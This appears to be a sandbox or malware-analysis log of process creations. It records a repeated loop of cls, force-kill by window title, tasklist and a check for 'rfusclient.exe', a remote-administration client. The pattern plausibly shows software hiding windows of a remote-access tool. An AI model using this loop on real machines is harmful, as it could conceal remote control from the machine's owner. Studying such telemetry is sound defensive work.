Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c' cls'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c' cls'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\tasklist.exe tasklist /FI 'USERNAME eq user'
Source: unknown	Process created: C:\Windows\System32\find.exe find /I /C 'rfusclient.exe'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\timeout.exe timeout 3 /nobreak
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\tasklist.exe tasklist /FI 'USERNAME eq user'
Source: unknown	Process created: C:\Windows\System32\find.exe find /I /C 'rfusclient.exe'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\timeout.exe timeout 3 /nobreak
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\tasklist.exe tasklist /FI 'USERNAME eq user'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\find.exe find /I /C 'rfusclient.exe'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\timeout.exe timeout 3 /nobreak
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\tasklist.exe tasklist /FI 'USERNAME eq user'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\find.exe find /I /C 'rfusclient.exe'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\timeout.exe timeout 3 /nobreak
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\tasklist.exe tasklist /FI 'USERNAME eq user'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\find.exe find /I /C 'rfusclient.exe'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\timeout.exe timeout 3 /nobreak
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\tasklist.exe tasklist /FI 'USERNAME eq user'
Source: unknown	Process created: C:\Windows\System32\find.exe find /I /C 'rfusclient.exe'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\timeout.exe timeout 3 /nobreak
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\tasklist.exe tasklist /FI 'USERNAME eq user'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\find.exe find /I /C 'rfusclient.exe'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\timeout.exe timeout 3 /nobreak
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\tasklist.exe tasklist /FI 'USERNAME eq user'
Source: unknown	Process created: C:\Windows\System32\find.exe find /I /C 'rfusclient.exe'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\timeout.exe timeout 3 /nobreak
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\tasklist.exe tasklist /FI 'USERNAME eq user'
Source: unknown	Process created: C:\Windows\System32\find.exe find /I /C 'rfusclient.exe'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\timeout.exe timeout 3 /nobreak
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\tasklist.exe tasklist /FI 'USERNAME eq user'
Source: unknown	Process created: C:\Windows\System32\find.exe find /I /C 'rfusclient.exe'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\timeout.exe timeout 3 /nobreak
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\tasklist.exe tasklist /FI 'USERNAME eq user'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\find.exe find /I /C 'rfusclient.exe'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\timeout.exe timeout 3 /nobreak
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\tasklist.exe tasklist /FI 'USERNAME eq user'
Source: unknown	Process created: C:\Windows\System32\find.exe find /I /C 'rfusclient.exe'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\timeout.exe timeout 3 /nobreak
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\tasklist.exe tasklist /FI 'USERNAME eq user'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\find.exe find /I /C 'rfusclient.exe'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\timeout.exe timeout 3 /nobreak
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\tasklist.exe tasklist /FI 'USERNAME eq user'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: unknown	Process created: C:\Windows\System32\find.exe find /I /C 'rfusclient.exe'
